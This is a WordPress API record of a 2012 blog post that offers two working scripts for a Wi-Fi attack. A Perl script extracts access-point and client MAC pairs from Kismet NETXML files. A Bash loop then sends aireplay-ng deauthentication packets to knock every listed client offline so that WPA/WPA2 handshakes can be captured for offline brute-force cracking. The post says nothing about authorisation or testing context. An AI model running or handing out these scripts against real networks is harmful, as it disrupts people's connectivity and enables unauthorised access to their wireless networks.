{"id":496,"date":"2012-04-05T12:49:33","date_gmt":"2012-04-05T18:49:33","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=496"},"modified":"2012-07-05T22:34:58","modified_gmt":"2012-07-06T04:34:58","slug":"parse-kismet-netxml-for-aireplay-ng","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2012\/04\/parse-kismet-netxml-for-aireplay-ng\/","title":{"rendered":"Parse Kismet NETXML for Aireplay-ng"},"content":{"rendered":"<p>This post deals with gathering the information you need to use aircrack-ng to capture a WPA\/WPA2 handshake for offline bruteforce attacks. \u00a0When running aireplay-ng to send out de-authentication packets you need the MAC address of the Access Point and a Client that is associated with it. \u00a0The way I would collect the information is run <a title=\"Kismet Wireless\" href=\"http:\/\/www.kismetwireless.net\" target=\"_blank\">Kismet<\/a>. \u00a0With the <a title=\"Kismet Old\" href=\"http:\/\/kismetwireless.net\/documentation.shtml#old\" target=\"_blank\">older version<\/a> of Kismet I would monitor the client (panel view) and select (copy\/paste) the access point and client MAC. \u00a0With the <a title=\"Kismet Newcore\" href=\"http:\/\/kismetwireless.net\/documentation.shtml#readme\" target=\"_blank\">new version<\/a> of Kismet you cannot select a MAC address. \u00a0So I wrote myself a quick Perl script to parse the Kismet NETXML file to create output with the MAC addresses of AP and associated client pairs.<br \/>\n<!--more--><br \/>\n<pre><code>\n#!\/usr\/bin\/perl\nuse XML::Simple;\n\n$xs = XML::Simple-&gt;new( KeyAttr=&gt;[] );\n$data = $xs-&gt;XMLin($ARGV[0]);\n\nfor $wn (@{$data-&gt;{&#039;wireless-network&#039;}}){\n&nbsp;&nbsp;$channel = $wn-&gt;{&#039;channel&#039;};\n&nbsp;&nbsp;$bssid = $wn-&gt;{&#039;BSSID&#039;};\n&nbsp;&nbsp;\n&nbsp;&nbsp;if(ref($wn-&gt;{&#039;SSID&#039;}-&gt;{&#039;encryption&#039;}) eq &#039;ARRAY&#039; &amp;&amp; $wn-&gt;{&#039;type&#039;} eq &#039;infrastructure&#039;)\n&nbsp;&nbsp;{\n&nbsp;&nbsp;&nbsp;&nbsp;if(ref($wn-&gt;{&#039;wireless-client&#039;}) eq &#039;ARRAY&#039;){\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for $wc (@{$wn-&gt;{&#039;wireless-client&#039;}}){\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($wc-&gt;{&#039;type&#039;} eq &#039;tods&#039;){\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print $bssid . &quot; &quot; . $wc-&gt;{&#039;client-mac&#039;} . &quot;\\n&quot;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;}\n&nbsp;&nbsp;}\n}\n\n<\/code><\/pre><\/p>\n<p>I then use the file that was created in a simple Bash script to use aireplay-ng to knock all the clients offline. \u00a0Of course you have airodump-ng listening for the WPA\/WPA2 handshakes.<\/p>\n<p><pre><code>\n#!\/bin\/bash\nset -x\nAIREPLAY=\/usr\/local\/sbin\/aireplay-ng\nWIFACE=$1\nFILE=$2\n\nwhile read bssid clientmac\ndo\n&nbsp;&nbsp;&nbsp;&nbsp;echo $x\n&nbsp;&nbsp;&nbsp;&nbsp;$AIREPLAY -0 1 -a $bssid -c $clientmac --ignore-negative-one $WIFACE\ndone &lt; $FILE\n\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post deals with gathering the information you need to use aircrack-ng to capture a WPA\/WPA2 handshake for offline bruteforce attacks. \u00a0When running aireplay-ng to send out de-authentication packets you need the MAC address of the Access Point and a Client that is associated with it. \u00a0The way I would collect the information is run [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[7],"tags":[98,43,115,33,116],"class_list":["post-496","post","type-post","status-publish","format-standard","hentry","category-scripts","tag-aircrack-ng","tag-kismet","tag-netxml","tag-perl","tag-scripting"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/496","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=496"}],"version-history":[{"count":6,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/496\/revisions"}],"predecessor-version":[{"id":577,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/496\/revisions\/577"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=496"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=496"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=496"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}